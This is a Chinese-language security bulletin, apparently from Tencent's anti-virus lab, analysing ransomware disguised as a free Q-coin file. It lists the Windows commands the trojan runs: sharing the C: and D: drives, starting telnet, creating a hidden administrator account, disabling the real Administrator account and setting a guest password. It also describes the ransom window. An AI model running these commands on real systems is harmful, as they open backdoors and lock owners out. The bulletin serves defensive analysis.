近日,腾讯反病毒实验室捕获一款勒索木马,其通过伪装成“免费领QB”文件在网络社交工具、网络共享盘、下载站进行传播。用户一旦下载运行后,将会导致电脑无法进入系统、个人隐私泄漏、磁盘文件被窃取、系统被破坏等安全隐患。
据安全专家表示,勒索木马运行后,会禁用当前账户、创建新用户并设置密码、设置访客账户密码、禁用任务管理器、隐藏桌面图标和任务栏、将磁盘设为共享、启动远程登录服务等行为。此外,木马还会在窗口中留下付款方式,要求用户付钱购买开机密码,给用户造成财产损失。
我们来看看该木马的详细分析。
1、通过修改注册表禁用任务管理器
2、隐藏任务栏
3、隐藏桌面图标
4、依次执行以下命令,破坏系统
net share houmen$=c:\\ 将c盘设置为共享,并将共享命名为houmen
net share houmen2$=d:\\ 将d盘设置为共享,并将共享命名为houmen2
net start telnet 启动telnet服务
net start Server 启动Server服务
net user Forbidden 1207142187 /add 新建用户并设置密码
net user Forbidden /active:yes 启用刚创建的用户
net localgroup Administrators Forbidden /add 将刚创建的账户设为管理员
net user Administrator /active:no 禁用名为Administrator的账户
tsshutdn 关机
dfrg.msc- 无效命令
syskey 打开账户数据库加密程序
iexpress 打开IExpress程序,创建自解压文件
Nslookup 查看DNS服务器地址
net share c$ /del 关闭C盘默认共享
net stop 无效命令
net user guest 12345 将guset账户的密码设置为12345
net password 无效命令
iisreset /enable 启动IIS服务
iisreset /rebootonerror 设置IIS:如果发送错误,重启计算机
5、创建全屏窗口,窗口内容如下:主要功能是要求用户联系对方,并支付赎金。
6、目前电脑管家可以有效查杀该木马
